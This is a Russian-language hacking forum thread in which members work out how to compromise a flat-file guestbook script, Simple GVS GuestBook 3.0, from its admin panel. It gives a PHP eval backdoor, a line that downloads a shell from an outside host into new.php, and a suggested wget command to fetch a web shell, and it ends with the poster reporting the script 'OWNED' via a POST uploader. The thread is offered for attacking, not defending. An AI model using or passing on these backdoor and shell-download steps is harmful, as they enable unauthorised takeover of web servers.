Simple GVS GuestBook 3.0 Final

Discussion in 'Песочница' started by kred0, 22 Jul 2015.

  1. kred0

    kred0 New Member

    Joined:
    22 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Собственно интересует наличие уязвимостей данного движка гостевой книги.
    Есть доступ в админку
    Движок работает только на файлах без использования внешних бд
    В админке можно включить html код в коментариях но толку от этого никакого
    Можно задать имя бд например config.php и слить дамп в формате .dat файла. но толку от этого тоже никакого т.к. из своей директории путем "../../../" выбраться нельзя.
    Есть загрузка дампа для востановления бд но ни шелл ни дамп не льётся на сервер.

    Исходники движка можно скачать тут:
    http://gb.lugr.ru/

    Может кто нибудь подскажет как разбомбить это NoName скрипт?
     
  2. kred0

    kred0 New Member

    Joined:
    22 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Через админку удалось записать бэкдор типа:
    Code:
    eval($_REQUEST[e]);
    После чего успешно выполнил phpinfo();

    далее пытаюсь залить шелл:
    Code:
    $fh = fopen('new.php', "a+");fwrite($fh, file_get_contents('http://somesite.ru/newfile.txt'));fclose($fh);
    и мне выдаёт:
    Так же успешно выполняется команда system(ls);
    но никуда попасть больше не могу... Получаю Method Not Implemented


    Подскажите как действовать дальше?
     
  3. nopony

    nopony New Member

    Joined:
    29 Aug 2013
    Messages:
    7
    Likes Received:
    2
    Reputations:
    8
    Вместо ls сделай "wget http://*путь до шелла в формате txt* -o shell.php"
     
  4. kred0

    kred0 New Member

    Joined:
    22 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Тоже самое.
    Method Not Implemented
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    это WAF? allow_url_fopen? только с GET так? какие загрузчики пробовали? может лучше сделать мини аплоадер файлов?
     
    _________________________
    kred0 likes this.
  6. kred0

    kred0 New Member

    Joined:
    22 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    1.По поводу WAF не знаю.
    2.allow_url_fopen on
    3.Пост запросы не пробовал
    4.мини аплоадер методом POST?
    Если можно ссылочку для примера.
     
  7. kred0

    kred0 New Member

    Joined:
    22 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Получилось сделать мини аплоадер с методом POST. Спасибо. Script OWNED;)